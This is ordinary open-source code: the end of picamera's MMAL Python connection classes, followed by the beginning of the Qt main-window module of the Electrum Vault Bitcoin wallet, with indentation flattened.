mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
}
def close(self):
super(MMALPythonTarget, self).close()
close_stream(self._stream, self._opened)
def enable(self):
self._event.clear()
super(MMALPythonTarget, self).enable()
def wait(self, timeout=None):
"""
Wait for the output to be "complete" as defined by the constructor's
*done* parameter. If *timeout* is specified it is the number of seconds
to wait for completion. The method returns ``True`` if the target
completed within the specified timeout and ``False`` otherwise.
"""
return self._event.wait(timeout)
def _handle_frame(self, port, buf):
self._stream.write(buf.data)
if buf.flags & self._done:
self._event.set()
return True
return False
class MMALPythonConnection(MMALBaseConnection):
"""
Represents a connection between an :class:`MMALPythonBaseComponent` and a
:class:`MMALBaseComponent` or another :class:`MMALPythonBaseComponent`.
The constructor accepts arguments providing the *source* :class:`MMALPort`
(or :class:`MMALPythonPort`) and *target* :class:`MMALPort` (or
:class:`MMALPythonPort`).
The *formats* parameter specifies an iterable of formats (in preference
order) that the connection may attempt when negotiating formats between
the two ports. If this is ``None``, or an empty iterable, no negotiation
will take place and the source port's format will simply be copied to the
target port. Otherwise, the iterable will be worked through in order until
a format acceptable to both ports is discovered.
The *callback* parameter can optionally specify a callable which will be
executed for each buffer that traverses the connection (providing an
opportunity to manipulate or drop that buffer). If specified, it must be a
callable which accepts two parameters: the :class:`MMALPythonConnection`
object sending the data, and the :class:`MMALBuffer` object containing
data. The callable may optionally manipulate the :class:`MMALBuffer` and
return it to permit it to continue traversing the connection, or return
``None`` in which case the buffer will be released.
.. data:: default_formats
:annotation: = (MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
Class attribute defining the default formats used to negotiate
connections between Python and and MMAL components, in preference
order. Note that OPAQUE is not present in contrast with the default
formats in :class:`MMALConnection`.
"""
__slots__ = ('_enabled', '_callback')
default_formats = (
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
)
def __init__(
self, source, target, formats=default_formats, callback=None):
if not (
isinstance(source, MMALPythonPort) or
isinstance(target, MMALPythonPort)
):
raise PiCameraValueError('use a real MMAL connection')
super(MMALPythonConnection, self).__init__(source, target, formats)
self._enabled = False
self._callback = callback
def close(self):
self.disable()
super(MMALPythonConnection, self).close()
@property
def enabled(self):
"""
Returns ``True`` if the connection is enabled. Use :meth:`enable`
and :meth:`disable` to control the state of the connection.
"""
return self._enabled
def enable(self):
"""
Enable the connection. When a connection is enabled, data is
continually transferred from the output port of the source to the input
port of the target component.
"""
if not self._enabled:
self._enabled = True
if isinstance(self._target, MMALPythonPort):
# Connected python input ports require no callback
self._target.enable()
else:
# Connected MMAL input ports don't know they're connected so
# provide a dummy callback
self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._target.enable(lambda port, buf: True)
if isinstance(self._source, MMALPythonPort):
# Connected python output ports are nothing more than thin
# proxies for the target input port; no callback required
self._source.enable()
else:
# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
except NameError:
return '<MMALPythonConnection closed>'
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import base64
import csv
import json
import os
import queue
import shutil
import sys
import threading
import time
import weakref
from decimal import Decimal
from functools import partial
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
import qrcode
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum.address_synchronizer import AddTransactionException
from electrum.bitcoin import COIN, is_address
from electrum.exchange_rate import FxThread
from electrum.i18n import _
from electrum.lnutil import ln_dummy_address
from electrum.logging import Logger
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.plugin import run_hook
from electrum.simple_config import SimpleConfig
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.util import PR_PAID, PR_FAILED
from electrum.util import PR_TYPE_ONCHAIN
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, UserCancelled, profiler,
export_meta, import_meta, bfh, InvalidPassword,
decimal_point_to_base_unit_name, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.util import pr_expiration_values
from electrum.version import ELECTRUM_VERSION
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
ThreeKeysWallet)
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .exception_window import Exception_Hook
from .fee_slider import FeeSlider
from .history_list import HistoryList, HistoryModel
from .installwizard import get_wif_help_text
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .three_keys_dialogs import PSBTDialog
from .transaction_dialog import PreviewTxDialog
from .transaction_dialog import show_transaction
from .update_checker import UpdateCheck, UpdateCheckThread
from .util import ButtonsTextEdit
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER)
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {version} is available").format(version=v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {tab_description}") if show else _("Show {tab_description}")).format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
#self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
#self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Vault"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.get_wallet_label()]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin Vault network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://bitcoinvault.global"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum Vault",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin Vault.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin Vault system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{number} new transactions: Total amount received in the new transactions {amount}")
.format(number=len(txns), amount=self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {amount}").format(amount=self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum Vault", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum Vault", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
#self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
def connect_fields(self, window, btc_e, fiat_e, fee_e):
